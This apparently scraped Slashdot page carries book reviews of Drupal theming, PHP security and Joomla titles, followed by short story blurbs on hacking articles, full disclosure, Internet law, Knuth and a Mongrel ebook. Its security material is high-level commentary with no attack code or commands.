Any reader who begins the book by skimming the table of contents or the preface's summary of Chapter 1, may be tempted to skip that chapter, especially since it discusses team workflow — something freelancers generally ignore, and employees leave to management. Yet the earlier material is worth reading, if only that it begins to establish a baseline of terminology used throughout the rest of the book. It also provides some basic information on content structure, layout, and naming on a Drupal page. For illustrating the ideas under discussion, the authors use a number of existing websites. In fact, too many different sites: Readers probably would have found it more useful for each idea to be presented in the context of a single neutral subject area, and without distractions such as toilet birthdays (no kidding). Even better, the ideas could have been illustrated through example pages — each page illustrating one or several ideas — built from the ground up. By focusing on pages that a reader could quickly create on his own, the authors could have eliminated the screenshots of those various websites. One example is Figure 1.1, which combines two images, with the topmost one largely obscuring the one below. Most of the topics are covered at a very high level — possibly higher in some cases than readers will find valuable. Nonetheless, there is much solid advice, including some recommended theme resources later in the chapter. In the earlier section on "Topical Organization," there is a brief but excellent discussion on the relative merits of limited versus unlimited tag vocabularies.

The second chapter continues to lay the groundwork, by introducing basic Drupal theme strategies and terminology, three major modules that veteran Drupal developers use frequently (CCK, Views, and Devel), and some valuable browser-based development tools. The definitions of Drupal terms are useful — especially for newbies confused by the Drupal handbooks. One exception is the authors' alternative metaphor for "weight," which proves more confusing than the original. Readers then begin learning how to use the aforesaid modules and tools. However, several of the authors' statements are misleading: On page 43, they are instructed to install the CCK module, and then given a list of additional modules needed; the first one on the list is... CCK. On the next page, the authors state that the FileField module requires the Token module, but it apparently does not. On the page after that, the "manage fields" link is given as the "add field" link. Those last two discrepancies suggest that the book is based on outdated versions of Drupal and/or the contributed modules under discussion, even though its publication date is just a few weeks prior to this writing. Any version differences are likely impossible to confirm, since the authors fail to mention which versions they are using, or provide any guidance to the reader as to which versions to use — unusual for a programming book. At the beginning of the chapter, the reader is told he "will learn step-by-step how to create a mini portfolio Web site," but the process peters out not long after a new content type is created, and the reader finishes the chapter with no such portfolio site.

Chapters 3 and 4 move the reader one step closer toward the ultimate goal of being able to create a new theme with confidence. The first one explains how to find, install, and configure prebuilt themes — also, how to create a very basic theme from scratch, and a subtheme using the Zen starter theme. This material comprises a generally thorough introduction to the topics, compared to most documentation, with plenty of step-by-step explanation. An exception is the Zen section, in which the reader is instructed to place the directory into the themes folder; but it is not made clear whether this is the primary Drupal themes folder, or sites/all/themes (as advised several pages earlier). Secondly, in step 3, readers can only guess as to what is meant by "the main CSS file," as there are several. On the next page, the authors mention "configure" links next to the Zen and Zen Classic themes, but no such links exist for those starter themes. The fourth chapter discusses page template files, site-wide variables, menus and navigation, regions and blocks, search results, templating different sections of a site, aliased URLs, taxonomy templates, and styling for output to printers, PDF files, and mobile devices.

The fifth chapter explores the details of how to modify existing node templates, or create new ones, for all content types. This is what makes it possible to develop highly customized page content, including summaries, embedded images, image galleries, and content based upon output from the Views module. The subsequent chapter focuses on one of the most problematic types of content — forms — and how they can be created using the CCK. The authors recommend TinyMCE as one's WYSIWYG editor module, but that has apparently been replaced by the Wysiwyg API. User editing of content is a key element in building an online community using a Drupal-based site, and it is the topic of Chapter 7, which discusses user profiles, permissions, access, comments, blogs, forums, wikis, spam, CAPTCHAs, and how to make content private for members only. The next chapter addresses the theming of the administrative interface, which the typical site user will never see, but can have a significant impact upon the productivity of the developers and maintainers of a site. Readers learn about RootCandy (a refreshingly different admin theme), and how to theme error pages.

The final three chapters focus on JavaScript and jQuery. Consequently, they compose a stand-alone resource of their own, and could even have been used as the basis for a separate book. Chapter 9 provides an overview of the language, while the other two chapters cover jQuery and how it can be used as part of a Drupal-based site.

Scattered throughout the manuscript are tips, each indicated with a pencil tip icon. These help to break up the text visually, and provide valuable guidance. The contrast between the black text and the dark gray background could certainly be improved; but most of the tips are fairly short, so this does not pose a major problem.

Every chapter ends with a summary, and not a single one of them is useful or needed. Any unique information conveyed in them should have been merged with the introductory paragraphs for the respective chapters, which is where readers would be looking anyway to see what each chapter addresses.

The book has numerous minor problems, including grammatical and stylistic errors, such as dashes incorrectly performing the duty of semicolons, some URLs missing the root directory slash, and excessive use of exclamation marks (more than a dozen before even reaching the second chapter). When stating the sequence of menu items to choose in order to reach a particular admin page, the authors should use ">" or ">>" to separate the menu choices, as is done in most computer books. Instead, the authors opted to use commas, which of course turns every sequential menu path into a list of menu items, which is nonstandard and disconcerting. As is typical in a first edition, the book contains several errata: "Partnership" in Figure 1.7 (page 10), "the GiMP" (page 14; should simply read "GIMP"; after all, this isn't Pulp Fiction), "only focus only" (page 26), "Modification / Date" in Figure 2.1 (page 37; should read "Modification date"), "Content Creation Kit" (throughout the book; should read "Content Construction Kit"), "of [the] view" (page 56), "http:jigsaw" (page 66), "INSTALL [is] present" (page 79), "of [a] page" (page 100), and "to to" (page 125) — in the first quarter of the book alone.

A lingering disappointment is that some of the promised examples are not finished in the narrative, such as the portfolio site mentioned earlier. Secondly, the downloadable source code is incomplete, apparently missing the example code in the first few chapters, such as the Bolg theme files. Furthermore, the downloadable code is not organized by chapter, making it difficult to even determine what example code is missing.

On the other hand, the book has much to offer. For the most part, the explanations and step-by-step instructions are clear, and the diagrams and screenshots are all neatly presented and helpful — though some sections of the book could have benefited from more such figures. With its extensive coverage of all the key technologies, and its wealth of valuable tips, Front End Drupal is an essential resource for learning how to create Drupal themes, and fills a long-standing gap in the Drupal literature, better than any other book currently available.

Michael J. Ross is a freelance Web developer and writer.

You can purchase Front End Drupal: Designing, Theming, Scripting from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael J. Ross writes "The owners and the developers of typical Web sites face a quandary, one often unrecognized and unstated: They generally want their sites' contents and functionality to be accessible to everyone on the Internet, yet the more they open those sites, the more vulnerable they can become to attackers of all sorts. In their latest book, Securing PHP Web Applications, Tricia and William Ballad argue that PHP is an inherently insecure language, and they attempt to arm PHP programmers with the knowledge and techniques for making the sites they develop as secure as possible, short of disconnecting them from the Internet." Keep reading for the rest of Michael's review. Securing PHP Web Applications author Tricia Ballad, William Ballad pages 336 publisher Addison-Wesley Professional rating 7/10 reviewer Michael J. Ross ISBN 978-0321534347 summary A wide-ranging guide to PHP security. The book was published by Addison-Wesley on 26 December 2008, under the ISBN 978-0321534347. The publisher maintains a Web page for the book, where visitors will find a detailed description, the table of contents, and a sample chapter ("Cross-Site Scripting," Chapter 10) only three pages in length — undoubtedly a record. That is essentially all one will find on that Web page. Most technical publishers offer far more information on the Web pages for each one of their books — such as the preface and index online, updates to the book's content (including reported errata, confirmed and otherwise), descriptions of the chapters, information about and pictures of the author(s), feedback from readers and the media, and, perhaps most valuable of all, the sample code used in the given book. (However, that is less of a factor with this particular book, since it does not contain much sample code.) Many such publisher pages even have links to book- or technology-specific forums, where readers can post questions to the authors, and read other people's questions and the replies. Addison-Wesley, like all of the Pearson Education imprints, has through the years proven quite sparing with the supplementary online content, thereby no doubt reducing the number of prospective readers and other traffic to their sites.

Despite its fairly modest length (336 pages) in comparison to the average programming book being published these days, Securing PHP Web Applications tries to cover a sizable number of topics, in five parts, which encompass 17 chapters: general security issues; error handling; system calls; buffer overflows and sanitizing variables; input validation; file access; user authentication; encryption and passwords; sessions and attacks against them; cross-site scripting; securing Apache and MySQL; securing IIS and SQL Server; securing PHP; automated testing; exploit testing; designing a secure application; and hardening an existing application. The book concludes with an epilogue on professional habits to improve the security of one's applications, an appendix describing additional resources, a glossary, and an index. Throughout the book, the authors illustrate key ideas with the use of a sample application — in this case, a Web-based guest book.

The first chapter, which is the only one in the first part of the book, is rather brief, but does prime the reader for all the material that follows, because it explains the inherent security problems of Web applications, and explains the dangers of some of the inadequate measures that naive programmers can take, such as security through obscurity, and the common belief that hackers only go after major Web sites.

Chapter 2 focuses on error handling, but begins with an example of SQL injection, and how effective it can be against the first iteration of the guest book application code. The most potentially confusing part of the discussion is when the authors show an SQL injection attack that perverts an INSERT statement by injecting it with an SQL command to drop a table, and the two commands are separated by a semicolon. But then instead of discussing how multiple SQL statements can be separated by semicolons (well, depending upon one's server settings), they instead discuss separating PHP commands was semicolons, but not SQL commands. Nonetheless, readers will find some good advice on handling unexpected input and using a centralized error-handling mechanism, even if quite simple. Also, the question of whether or not to accept HTML in user input, is briefly addressed. However, the material would be more useful if the authors were to explain specifically when htmlspecialchars() should be used instead of htmlentities(). Also, the option of using standard bulletin board codes (such as [b]bold[/b]) should have been mentioned, if only briefly with references to outside resources. At the bottom of page 22, the bare regex following a !"~" is not valid PHP (or even Perl, which it much more resembles). Lastly, one should not follow the recommendation of providing absolutely no feedback to the user as to what characters were invalid in the text they entered. Hackers gain nothing from being told the obvious, that HTML tags are not allowed; but legitimate users will be incensed when told only that the system didn't understand their input, with no indication as to how to make it acceptable.

In the third chapter, the authors explain the obvious danger of using unsanitized user input within a call to the operating system, such as exec() or system(). The discussion here assumes that you are on a *nux server, not Windows. Two PHP commands are suggested for sanitizing user input, as well as the option and advantages of building a custom API that is limited to only the system calls that should ever be executed within your Web application. On page 33, their test code appears to assume that register_globals has been enabled (so the GET variables in the malicious URL are automatically instantiated and set to the values in the URL), which is disappointing for a book on PHP security, since the dangers inherent in register_globals are so severe that it is now disabled by default, is deprecated in PHP version 5.3.0, and will be completely removed in version 6.

In Chapter 4, readers get an overview of program and data storage on a computer, including buffers, stacks, and heaps, as groundwork for learning what buffer overflows are and how hackers can try to exploit them to execute database and operating system statements, including using your server as a staging point for remote exploits and denial-of-service attacks. The fifth chapter dovetails nicely with the previous one, because it discusses input validation, which is a key component of avoiding boundary condition attacks. The authors explain the importance of validating tainted data, using character length and regular expressions. One simple countermeasure to such attacks that the authors fail to mention, is simply setting a maximum input length ("maxlength") on HTML "input" tag fields. After all, most entry fields on forms are input tags — not textarea tags, for which the maxlength attribute only specifies wrapping. Using maxlength does not prevent manipulation of POST values, but does prevent the less knowledgeable attacker from overflowing input tag fields.

Chapter 6 explains the risks in working with local and remote files, and why it is critical to not allow mischievous users do such tricks as inserting a pathname in a filename, when your code is expecting only a simple filename. Unfortunately, some of the code and claims in this chapter are suspect: On page 70, the value of $path_to_uploaded_files is missing a needed trailing forward slash. The suggested method of processing malicious file paths could be made much more simple and secure with the use of basename(). The file_get_contents() attack shown on page 71 again seems to assume that register_globals is enabled; even if it were enabled, the exploit wouldn't work because $file is always set to a value in the script code. The authors seemingly believe that GET variables can override anything in a script. Nonetheless, their advice about handling user-uploaded files is spot on.

Part 4 of the book focuses on user security. The first of its chapters covers user authentication and authorization — combining the two for their sample application — and starting with usernames and passwords. Access denial due to invalid username or password is supposedly illustrated by Figure 7.2, but all that it illustrates is that a concept that needs no visual depiction is not made more clear by trying to represent it with a confusing image. The authors provide a thorough discussion of authentication purposes and methods, as well as password encryption and strength. Yet they provide no rationale for setting the default values for usernames, passwords, and e-mail addresses to "&nbsp;" simply because the columns are non-nullable. After all, a record would only be added to the table if those values were known. Also, in their validateUsernamePassword() function, they've mistakenly commented out the first "return FALSE;" and they create unused variables $username and $password.

Chapter 8 provides an overview of various types of encryption, particularly for passwords, and some recommendations for PHP-supported algorithms. One blemish in this discussion is the claim that the longer the key for decryption, the longer it will take for your application to load the data (presumably the encrypted text) — which doesn't make sense. Also, their password() and login() functions reference class member names of an object not yet defined or explained. Code out of context like this can be confusing to the reader.

Sessions are a key component of maintaining and securing the identity of an authenticated user as she goes from one page to another in your PHP application. In Chapter 9, the authors describe the three major categories of session attacks: fixation, hijacking, and injection. The next chapter addresses cross-site scripting (XSS), but runs only three pages, and provides no examples of an XSS attack, which would have been helpful for the reader to understand how such an attack could try to compromise his PHP code, and what sort of malicious code to look for in his site. However, references to four open source XSS filtering projects are provided, in case the reader would like to learn more about them.

The fifth part of the book is devoted to securing whichever server environment on which you choose to host your application — Apache and MySQL, or IIS and Microsoft SQL Server, as well as PHP. In the chapter on PHP, the authors present the Zend Core release of PHP, which can save developers time in installing components of the LAMP stack, and also save them from reinventing the wheel, by using the Zend Framework. Other techniques for hardening PHP are discussed. Chapters 14 and 15 explain how to use automated testing and exploit testing, to increase your application's security, using powerful exploit testing tools — free and proprietary.

The sixth and final part of the book contains two chapters, which purportedly discuss the advantages of designing security into a new application right from the start, and how to improve security in an application that has already been built. In the former chapter, the authors stress the importance of balancing no design ("Skip reading Slashdot for one day...") and too much design (i.e., stalling). But the material mostly consists of the basics of designing a Web application, with no new information on security, and concludes with a brief reiteration of security principles detailed in earlier chapters. The latter chapter offers some good advice on having separate development and test environments, in addition to the production environment. The principles expounded in each of the two chapters, do not overlap at all, and yet together they apply equally to new applications under development just as much as they do to finished applications; splitting the principles up does not make sense.

Sadly, the book does not live up to its potential. In general, much of the sample code is sloppy, as exemplified by the instances noted above. The authors and the technical reviewers should have tested the attacks, and thereby found which ones don't work. Even the HTML should not be used by any new Web developer as an example of quality code that adheres to leading standards. In the HTML that they have their sample PHP code generate, the tag attribute values are in single quotes, and not double, which means all of that code would need to be changed to make it compliant with XHTML 1.0. Moreover, by choosing to use single quotes for both the attribute values and the PHP strings, the authors end up having to escape every single attribute value quote mark, which wastes space and looks ridiculous. They repeat this at the end of Chapter 6, but this time with all double quotes. Also, some of the technical decisions are rather odd, such as their setting those default values to spaces in the user table, noted earlier. A few terms are used strangely, as well, such as their statement that IIS's footprint is the number of entry points to it; actually, a Web server software's footprint generally refers to how much memory it consumes. Every chapter ends with a summary, titled "Wrapping It Up," none of which add any value to the book. There are at least three technical errata in the book that should have been caught: spaces in "u + rwx, go + rx" (page 76), and the invalid addresses "www.blog/modsecurity.org" (page 215) and "www.ballad-nonfiction/SecuringPHP/" (page 288; adding ."com" does not fix it).

On the other hand, the book's marketing copy claims that "Tricia and William Ballad demystify PHP security by presenting realistic scenarios and code examples, practical checklists, detailed visuals..." and that is certainly a fair claim. Most of the explanations are straightforward and informative. As a side note, kudos to Addison-Wesley for printing this book on recycled paper; one can only hope that all publishers adopt that policy.

The primary value of Securing PHP Web Applications is that it touches upon security topics that are often glossed over or completely neglected in other PHP security books and articles. This is important, because online miscreants will be searching out every possible chink in your Web site's armor. You should do the same, before they strike — and this book shows how.

Michael J. Ross is a freelance Web developer and writer.

You can purchase Securing PHP Web Applications from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael J. Ross writes "Of all the content management systems (CMSs) from which a Web developer can choose for creating a new Web site, Joomla is generally considered to be one of the top choices -- partly because an experienced developer can create an attractive site faster with Joomla than with the majority of other CMSs. However, Joomla's online documentation leaves much to be desired, as is true for most if not all CMSs. Intermediate and especially new developers need a clear and comprehensive resource that can explain the terminology, customization, administrative panel, and other aspects of Joomla. A promising candidate is a book written by Barrie M. North, titled Joomla! A User's Guide: Building a Successful Joomla! Powered Website." Keep reading for the rest of Michael's review. Joomla! A User's Guide author Barrie M. North pages 480 publisher Prentice Hall PTR rating 8 reviewer Michael J. Ross ISBN 0136135609 summary learn how to create and manage a website powered by Joomla! It was published by Prentice Hall, under the ISBNs 0136135609 and 978-0136135609, on 21 December 2007 (although page 233 confusingly suggests that the material was written in November 2006). The book is available not only in print, but in electronic form as well, as part of the Safari Books Online library. On the publisher's Web page for the book, visitors can read the table of contents, the preface, and the index. Also, they can download a sample chapter -- "Creating a Pure CSS Template" -- as a PDF file. Lastly, visitors can check for updates to the book's content, i.e., reported errata, of which there are more than half a dozen, as of this writing.

The majority of the book's 480 pages are organized into 12 chapters, covering a number of topics: an introduction to CMSs and Joomla; installing Joomla; administration basics; content management; menus; extensions; WYSIWYG editing of content; search engine optimization (SEO); building a table-less template; and how to build Joomla sites for a school, a restaurant, and a blog. Four appendices cover: getting help on your Joomla problems; case studies; SEO basics; and installing WAMP5. The book offers plenty of screenshots, which make it possible for someone to follow the discussion even when away from their computer. Sadly, much of the text shown in the illustrations is extremely small, and could prove very difficult to read for anyone with diminished vision. Even some of the captions are so small as to almost require the use of a magnifying glass. Moreover, the illustrations are printed in light gray, which makes the situation even worse.

The intended purpose of the book is "to guide a non-technical user step-by-step in learning how to create and manage a website powered by Joomla" (page 7). The book is definitely geared towards people new to Joomla, and even new to Web development, given the amount of elementary material covered, such as the author's explanation of Joomla's need for a Web server.

In the preface, the author touches upon the growing popularity of Joomla for a wide variety of Web sites. He also mentions that PHP and CSS are not prerequisites for understanding the book; however, readers not well experienced in those technologies will struggle in implementing everything described in the book -- especially templates -- and this is substantiated by readers' comments online. Admittedly, a book that provided adequate coverage of PHP, CSS, and then Joomla, would likely be overwhelming in length. Readers unfamiliar with PHP and CSS should first secure a basic grounding in those technologies, prior to trying to create their own templates or other Joomla extensions. On the other hand, if a reader has no intention of creating any extensions of their own, then they can still use Joomla to build a new Web site, and use this book to learn how to do so.

In the first chapter, the author provides a valuable introduction to CMSs and the advantages they offer in separating content from the Web pages themselves. However, he refers to Joomla as a rebranding of Mambo, while it would be much more accurate to characterize it as a derivative project, having forked from Mambo, which still exists (sort of). The author also lists Joomla's major features, and the basic elements of a Joomla-powered Web site. Installing and configuring a CMS -- particularly for the first time -- is oftentimes a major stumbling block for any Web development newbie. Chapter 2 steps the reader through the process of downloading and installing the latest version of Joomla (the book uses version 1.5 RC1).

In the third chapter, the author explains the most commonly used administrative tasks, and how to accomplish them in the Joomla 1.5 administrative panel. He intentionally does not cover all of the administrative settings, and this may prove frustrating to some readers who are looking for comprehensive coverage. Yet he does note that such readers should consult the official Joomla User Manual. Also available is the Administrator Manual. The fourth chapter describes in detail how Joomla displays content in pages, how it organizes that content in sections and categories, and the role played by the Front Page component. It concludes with a discussion of how to create menu items and how to connect them to components, as well as how to use module content. Especially valuable to Joomla beginners is the explanation of the two methods of deciding what content appears on a site's homepage.

As noted in the preface, the relationship among menus, menu items, pages, and modules, is one of the most confusing aspects of Joomla -- even after the improvements with version 1.5. In Chapter 5, the author explains this relationship, and then the major menu layouts and how to control them using the various sets of parameters. He mentions the overriding of global settings, and this points up how, prior to this, the book should have explained where to change those global settings, and recommended values. The index is of no help, because they are not mentioned. In Chapter 6, the author shows how to install and manage extensions, which comprise components, modules, plug-ins, templates, and languages. (Templates were missing from his list presented in the book's preface.) Chapter 7 examines the use of WYSIWYG editors for changing content on the back-end and front-end.

The most functional and attractive Joomla-powered Web site will be of little value if it receives few visitors. Thus, search engine marketing (SEM), discussed in the eighth chapter, is of critical importance, and the author's largely sensible advice is worth reading -- despite the nonsensical reference to cowboys and cowgirls (on page 198), and his reference to the "miserable failure" Google bomb, which was diffused back in January 2007. Note that the links provided to the SEM tools strongly recommended by the author -- WordTracker, PR Prowler, and Perry Marshall -- are affiliate referral links. Thus it seems disingenuous when he writes "...this might be the place I would have a few affiliate links!" (emphasis added). Speaking of emphasis, it seems as if too much weight is given to resources from which the author would receive affiliate compensation. This is not what readers typically expect in a book for which they have paid good money. Also discussed in the chapter are the important topics of Web standards, accessibility, keywords, referral traffic, pay-per-click traffic, Google AdWords, e-mail traffic, and common SEM mistakes. He correctly points out the low SEM value of Joomla's native "Read more..." anchor text. But his recommended solution, a mambot from Run Digital, does not appear to work with Joomla version 1.5.

Most of the templates written for Joomla and Mambo have used tables for page layout, instead of the more accessible and efficient CSS approach. CSS- based templates are only now becoming increasingly available, and Chapter 9 furthers this worthy goal by stepping the reader through the development of a pure CSS template. As noted earlier, readers unfamiliar with CSS will most likely find this chapter quite daunting, if not disheartening. The book's overall tutorial approach kicks into full gear in the last three chapters, in which the author shows in great detail how to create Web sites for a school, a restaurant, and a blog site. This material could prove very helpful to readers who wish to review and put into practice the more theoretical ideas introduced in the earlier chapters.

In general, readers should be pleased with this book. Even though the author is clearly a fan of Joomla, and the tone of the book is positive, he does not hesitate to point out Joomla's flaws, such as the misleading name of a module type. This is rare among technical authors nowadays, and for this Barrie North should be commended. Yet it is odd that he does not mention the obvious misspelling, "Imagess," in Extensions > Module Manager > module > Other Parameters.

Sprinkled throughout all of the chapters, the reader will find short paragraphs, with a dark background, labeled "The Least You Need to Know." These summarize the preceding paragraphs. This could perhaps be justified after a significant number of paragraphs, but unfortunately they also appear after just a couple paragraphs, which makes these "LYNTK" boxes redundant and unnecessary. Even worse, every chapter ends with a summary, which further repeats the boxes' content. With the book nearing 500 pages, the chapter summaries and even the LYNTK boxes should be excised, to good effect. Also, most of the chapters contain at least one footnote, which are not located at the bottom of the page or collected in a special section at the end of the book (as is traditional), but instead listed at the end of the chapter. Such material should instead be integrated into the text, if it is important enough to be included in the book, or left out entirely.

The writing quality of the book is generally solid, and the writing style is straightforward and friendly. Yet it does contain some blemishes that should have been caught by the publisher's editors, e.g., multi-word adjectives missing hyphens; misuse of the terms "that" versus "who"; inconsistent use of lowercase and title case for Joomla roles, even in the same paragraph; the same inconsistency in menu names, such as in Chapter 4; and the inexcusable "try and explain" (should read "try to explain"; page 19, among others). Thankfully, the author intentionally leaves off the silly exclamation mark from the Joomla name, starting after the preface, for greater readability. The book contains some misspellings/errata, such as "eXtensible" (page 2), "Wordpress" (pages 7 and 8), "over writing" (page 22), "Cpanel" (pages 27 and 29), "php html" (page 148), "api" (page 150), "flash" (page 209), "sight" (should read "site"; page 221), and "add fee" (should read "ad fee"; page 225). The author incorrectly states that the acronym PHP stands for only "Hypertext Preprocessor," but it actually is now a recursive acronym of "PHP Hypertext Preprocessor."

Overall, the book's production quality is up to snuff. The book stays open fairly well, despite the absence of any special lay-flat binding. The pages were produced using recycled paper, which is always encouraging to see. Unfortunately, the pages are thinner than in any other technical book I have ever seen, thereby allowing the text on the other side of each page to show through. This exacerbates the aforementioned problem of the text within the figures being difficult to read. Moreover, all of the copies that I have seen have an unusual diagonal ridge along the bottom edge, suggesting that the page cutting machinery was malfunctioning -- at least for one batch of copies produced, and perhaps more. In addition, some of the pages have small ink blotches. At a list price of almost $45, the book might seem a bit pricey. But online bookstores are fully discounting it, such as Amazon.com's current price of under $30.

The book may have some minor weaknesses, noted above, but otherwise, Joomla! A User's Guide is a logically organized and potentially quite valuable resource for beginning and intermediate Joomla developers -- perhaps the best Joomla book currently available.

Michael J. Ross is a Web developer, writer, and freelance editor.

You can purchase Joomla! A User's Guide from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

twistedmoney99 writes "InformIT.com has a whimsical yet intriguing look at the OLPC in an article series titled "One Leet Pwning Child — Give one, Get Owned". Part one details how to upgrade the core system with some extras, but part two is where the fun begins as the author converts the OLPC into a lean green hacking machine to enable wireless sniffing, setup the OLPC for vulnerability assessments, and stage the device for a little autopwning with Metasploit."

twistedmoney99 writes "InformIT.com has a whimsical yet intriguing look at the OLPC in an article series titled "One Leet Pwning Child — Give one, Get Owned". Part one details how to upgrade the core system with some extras, but part two is where the fun begins as the author converts the OLPC into a lean green hacking machine to enable wireless sniffing, setup the OLPC for vulnerability assessments, and stage the device for a little autopwning with Metasploit."

eldavojohn writes "You may be familiar with Donald Knuth from his famous Art of Computer Programming books but he's also the father of TeX and, arguably, one of the founders of open source. There's an interesting interview where he says a lot of stuff I wouldn't have predicted. One of the first surprises to me was that he didn't seem to be a huge proponent of unit tests. I use JUnit to test parts of my projects maybe 200 times a day but Knuth calls that kind of practice a 'waste of time' and claims 'nothing needs to be "mocked up."' He also states that methods to write software to take advantage of parallel programming hardware (like multi-core systems that we've discussed) are too difficult for him to tackle due to ever-changing hardware. He even goes so far as to vent about his unhappiness toward chipmakers for forcing us into the multicore realm. He pitches his idea of 'literate programming' which I must admit I've never heard of but find it intriguing. At the end, he even remarks on his adage that young people shouldn't do things just because they're trendy. Whether you love him or hate him, he sure has some interesting/flame-bait things to say."

mstrchf07 writes "The FCC will soon be auctioning off the rights to use the 700MHz spectrum for wireless communications, with the winner being able to choose the direction of wireless services development in the US. With stakes this high, is the playing field fair, and are business needs trumping consumer and technological interests?"

twistedmoney99 writes "InformIT has posted a two part article by Seth Fogie that describes how a wireless IP camera can be owned and abused. The first part describes how the camera's feed can be sniffed, replaced, or even DoSed off the air by a PDA. The second part then takes a look at the web application interface of the camera (an Axis207W) and exposes numerous vulnerabilities that lead to exposed passwords, a software based DoS, global XSS — and the kicker — a CRSF attack through which an attacker can remotely penetrate the network it is installed on."

twistedmoney99 writes "InformIT has posted a two part article by Seth Fogie that describes how a wireless IP camera can be owned and abused. The first part describes how the camera's feed can be sniffed, replaced, or even DoSed off the air by a PDA. The second part then takes a look at the web application interface of the camera (an Axis207W) and exposes numerous vulnerabilities that lead to exposed passwords, a software based DoS, global XSS — and the kicker — a CRSF attack through which an attacker can remotely penetrate the network it is installed on."

twistedmoney99 writes "The full-disclosure debate is a polarizing one. However, no one can argue that disclosing a vulnerability publicly often results in a patch — and InformIT just proved it again. In March, Seth Fogie found numerous bugs in EZPhotoSales and reported it to the vendor, but nothing was done. In August the problem was posted to Bugtraq, which pointed to a descriptive article outlining numerous bugs in the software — and guess what happens? Several days later a patch appears. Coincidence? Probably not considering the vendor stated "..I'm not sure we could fix it all anyway without a rewrite." Looks like they could fix it, but just needed a little full-disclosure motivation."

twistedmoney99 writes "The full-disclosure debate is a polarizing one. However, no one can argue that disclosing a vulnerability publicly often results in a patch — and InformIT just proved it again. In March, Seth Fogie found numerous bugs in EZPhotoSales and reported it to the vendor, but nothing was done. In August the problem was posted to Bugtraq, which pointed to a descriptive article outlining numerous bugs in the software — and guess what happens? Several days later a patch appears. Coincidence? Probably not considering the vendor stated "..I'm not sure we could fix it all anyway without a rewrite." Looks like they could fix it, but just needed a little full-disclosure motivation."

twistedmoney99 writes "The full-disclosure debate is a polarizing one. However, no one can argue that disclosing a vulnerability publicly often results in a patch — and InformIT just proved it again. In March, Seth Fogie found numerous bugs in EZPhotoSales and reported it to the vendor, but nothing was done. In August the problem was posted to Bugtraq, which pointed to a descriptive article outlining numerous bugs in the software — and guess what happens? Several days later a patch appears. Coincidence? Probably not considering the vendor stated "..I'm not sure we could fix it all anyway without a rewrite." Looks like they could fix it, but just needed a little full-disclosure motivation."

mrcaseyj writes "A post on the IE blog criticizes some banks for no longer using secure connections for entire login pages and only encrypting the password as it goes back to the bank. This prevents simple password sniffing but doesn't prevent a man in the middle attack from replacing the unsecured login page with one that has disabled encryption. This is especially a problem if you are using an unencrypted wireless connection such as at a coffee shop, because hackers can easily use the airpwn package to intercept the login page and steal your password. An easy remedy for when a secure page isn't available is to enter a bad username and password which usually brings up a secure page telling you to try again. But can you really trust your money to a bank that doesn't even offer the option of a secure login page?"

An anonymous reader writes "When a US legislator describes the Internet as a 'series of tubes' you just know that you're going to end up with some wacky laws on the books. Law professor Eric Goldman takes a look at the best and worst Internet laws in the U.S. Goldman offers an analysis of the biggies such as the DMCA, but also shines light on lesser-known laws like the Dot Kids Implementation and Efficiency Act of 2002. And he actually finds four Internet laws that aren't all bad."

monkeyboy44 writes "Following up on last year's entertaining hacker vs. student showdown, InformIT.com once again covered the annual Mid-Atlantic Regional Collegiate Cyber Defense Competition where college students are put to the test. During the three day event, small teams from eight of the areas colleges are handed insecure networks that they have to lockdown and keep running — all while a team of hackers attempt to gain access any way they can. To keep it interesting, the teams also had to perform various tasks, such as program web applications, install IDS systems and more — and if hacked, the US Secret Service was on hand to determine if there was enough data to start an investigation. Once again, the hackers dominated — but not without a few surprises."

twistedmoney99 writes "Anyone who has upgraded their digital camera probably has a few older, incompatible media cards lying around — so why not post them on Ebay? Well, if you do, be sure to properly wipe them because the digital voyeurs are watching. Seth Fogie at InformIT.com purchased a bunch of used cards from Ebay and found recoverable data on most of them. Using the freely available PhotoRec application, he was able to extract pictures, movies, and more from apparently formatted cards. The picture is clear — wipe anything that can store digital data before getting rid of it."

Simon P. Chappell writes "I'm not normally much of a one for reading and learning out of eBooks, but after a little gentle persuading from my regular contact at the publisher, I agreed to take a look at their Mongrel Shortcut eBook. Mongrel is a pure Ruby web server, and while it is normally associated in most people's minds with Ruby on Rails, it is actually possible to run it standalone, anywhere that you have Ruby. As one who is very firmly in the "dead tree" camp for my choice of reading media, I was surprised to find myself impressed with Addison Wesley's range of Shortcut ebooks; they really are close to the readability of regular books." Read the rest of Simon's review. Mongrel Shortcuts author Matt Pelletier and Zed Shaw pages 106 publisher Addison Wesley rating 8/10 reviewer Simon P. Chappell ISBN 0321483502 summary An excellent guide to configuring and using Mongrel.

The obvious market segment for this book is the Ruby on Rails developer who wants to understand more about the server that their application is running on and who would like to take more responsibility for it's installation and ongoing maintenance. A second target audience would be those who are looking for a small, efficient and robust web server. Mongrel, through strict adherence to the HTTP 1.1 specification has stayed small and very resistant to many forms of Internet attacks. There is a demand for that kind of server and this book will help those who need it.

Interestingly, these shortcut books are not available through the normal online bookstores. They are currently only available through www.awprofessional.com/ruby or www.informit.com/shortcuts. I'm not sure of the logic behind this and I wonder if that isn't going to hamper sales efforts.

At the risk of pointing out the obvious, this is an eBook and as such is supplied as a Portable Document Format (PDF) file. There are two big positives for me with this book. The first is that the file has no Digital Rights Management technology. This means that you are free to copy it to your computer, but you cannot share the file with anyone else. This is very reasonable approach for Addison Wesley to take and I applaud them for this. Now that they've shown their trust in us, I just hope that those who purchase this book will abide by those conditions. (Apparently, they don't trust me as much as they trust you, because my copy has "Review Copy Only" on the top of each page! :-)

The second positive with this book is that it's formatted with landscape orientation. This means that the long side of the page runs horizontally and thereby allows the whole page to fit nicely on a standard laptop screen with a very readable text size. Landscape orientation makes for very a clean page layout, a matter of vital importance if you're expecting folks to read it from a computer screen.

As far as the structure of the content, this book eschews chapters in favor of sections. Of course, with no section more than twenty pages long, calling them chapters would have been stretching a point. The nine sections cover about every aspect of using Mongrel that you could hope for in a short book.

The first section introduces the book and explains the formatting used as well as the special little sidebars called "Zed Sez". These are highly opinionated, but very insightful, asides on aspects of Mongrel; they cover reasons for writing it and why it was written the way it was. Section two is an introduction to Mongrel itself, the benefits of using it and the license that it is made available under. Section three works through everything you need to know to get started with Mongrel. Naturally, this includes installing it and basic usage.

